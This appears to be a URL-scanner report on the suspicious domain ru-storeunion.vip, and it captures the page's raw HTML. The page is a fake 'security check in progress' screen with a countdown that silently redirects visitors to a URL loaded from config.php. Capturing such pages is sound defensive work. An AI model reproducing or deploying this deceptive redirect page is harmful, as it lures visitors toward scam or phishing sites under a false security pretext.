https://mobile.line.ru-storeunion.vip/

ID de l'analyse :
2b117c17-dab4-4820-8a5d-525b90dfbc6dTerminée
URL soumise :
https://ru-storeunion.com/Redirigé
Fin du rapport :

Liens : 0 trouvé(s)

Liens sortants identifiés à partir de la page

Variables JavaScript : 11 trouvée(s)

Les variables JavaScript globales chargées dans l'objet fenêtre d'une page sont des variables déclarées en dehors des fonctions et accessibles depuis n'importe quel endroit du code au sein du champ d'application actuel

Messages de journal de console : 3 trouvé(s)

Messages consignés dans la console web

HTML

Le corps HTML de la page en données brutes

<!DOCTYPE html><html><head><style>
    body {
        margin: 0;
        padding: 0;
        background: #e6eaeb;
        font-family: Arial, sans-serif
    }

    a {
        text-decoration: none;
        color: #7b7b7b
    }

    .new-alert-box {
        position: relative;
        margin: 96px auto 0;
        padding: 180px 85px 22px;
        border-radius: 10px 10px 0 0;
        background: #fff;
        box-shadow: 5px 9px 17px rgba(102, 102, 102, .75);
        width: 286px;
        color: #fff;
        text-align: center
    }

    .new-alert-box p {
        margin: 0
    }

    .new-alert-circle {
        position: absolute;
        top: -50px;
        left: 111px
    }

    .new-alert-sec-circle {
        stroke-dashoffset: 0;
        stroke-dasharray: 735;
        transition: stroke-dashoffset 1s linear
    }

    .new-alert-sec-text {
        position: absolute;
        top: 20px;
        left: 190px;
        width: 76px;
        color: #000;
        font-size: 68px
    }

    .new-alert-sec-unit {
        font-size: 34px
    }

    .new-alert-body {
        margin: 35px 0;
        margin-bottom: 30px
    }

    .new-alert-head {
        color: #242424;
        font-size: 28px
    }

    .new-alert-concent {
        margin: 25px 0 14px;
        color: #7b7b7b;
        font-size: 18px
    }

    .new-alert-concent p {
        line-height: 27px
    }

    .new-alert-btn {
        display: block;
        border-radius: 10px;
        background-color: #ff5656;
        height: 55px;
        line-height: 55px;
        width: 286px;
        color: #fff;
        font-size: 20px;
        text-decoration: none;
        letter-spacing: 2px
    }

    .new-alert-btn:hover {
        background-color: #ff5656
    }

    .new-alert-footer {
        margin: 0 auto;
        height: 42px;
        text-align: center;
        width: 100%;
        margin-bottom: 10px
    }

    .new-alert-footer-icon {
        float: left
    }

    .new-alert-footer-text {
        float: left;
        border-left: 2px solid #eee;
        padding: 3px 0 0 5px;
        height: 40px;
        color: #0b85cc;
        font-size: 12px;
        text-align: left
    }

    .new-alert-footer-text p {
        color: #7a7a7a;
        font-size: 22px;
        line-height: 18px
    }
</style>




    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>loading, please wait。。。。</title>
</head>

<body>
<div id="js-alert-box" class="new-alert-box" style="display: block;">
    <svg class="new-alert-circle" width="234" height="234">
        <circle id="js-fst-circle" cx="117" cy="117" r="108" fill="#FFF" stroke="#ff5656" stroke-width="17">
        </circle>
        <circle id="js-sec-circle" class="new-alert-sec-circle" cx="117" cy="117" r="108" fill="transparent" stroke="#F4F1F1" stroke-width="18" transform="rotate(-90 117 117)" style="stroke-dashoffset: 735;"></circle>
        <text class="new-alert-sec-unit" x="100" y="172" fill="#BDBDBD"></text>
    </svg>
    <div id="js-sec-text" class="new-alert-sec-text" style="left: 170px">72</div>
    <div class="new-alert-body">
        <div id="js-alert-head" class="new-alert-head">security check in progress</div>
        <div class="new-alert-concent">
            <p id="pcon" style="color:green">security check in progress. Please wait a moment</p>
        </div>
        <a id="js-alert-btn" class="new-alert-btn" href="https://mobile.line.ru-storeunion.vip">enter</a>
    </div>
    <div class="new-alert-footer clearfix"></div>
    <div id="webstat" style="display: none;"></div>
</div>


<script src="config.php"></script>
<script>
let zy2jump=1;
    document.addEventListener('DOMContentLoaded', async function () {
        setupAnimation();
        setupPage(url);
    });
</script>

<script>
    function setupAnimation() {
        const totalTime = 10;
        const str1 = "security check in progress";
        const str2 = "network security";
        const completedTitle = `security`;
        const pcon = "security check in progress. Please wait a moment";
        const btnText = "enter";
        const bodyWidth = document.body.offsetWidth;
        const jsAlertBox = document.getElementById("js-alert-box");
        const boxWidth = jsAlertBox.offsetWidth;
        const btn = document.getElementById("js-alert-btn");
        const jsSecText = document.getElementById("js-sec-text");
        const jsSecCircle = document.getElementById("js-sec-circle");
        const jsFstCircle = document.getElementById("js-fst-circle");

        if (bodyWidth < boxWidth) {
            jsAlertBox.style.left = -Math.round((boxWidth - bodyWidth) / 2) + "px";
        }
        jsAlertBox.style.display = "block";
        document.getElementById("pcon").innerHTML = pcon;
        document.getElementById("js-alert-head").innerHTML = str1;
        btn.innerHTML = btnText;
        jsSecCircle.style.strokeDashoffset = "735";

        let num = 0;
        const t = setInterval(function () {
            num++;
            jsSecText.innerText = num;
            if (num >= 100) {
                clearInterval(t);
                jsFstCircle.style.stroke = "rgb(26, 173, 25)";
                btn.style.backgroundColor = "rgb(26, 173, 25)";
                document.title = completedTitle;
                document.getElementById("js-alert-head").innerHTML = str2;
            }
        }, totalTime);
    }

    function setupPage(url) {
        document.getElementById("js-alert-btn").href = url;
        if (zy2jump == 1) {
            setTimeout(() => {
                window.location.href = url;
            }, 1000)
        }
    }
</script>

</body></html>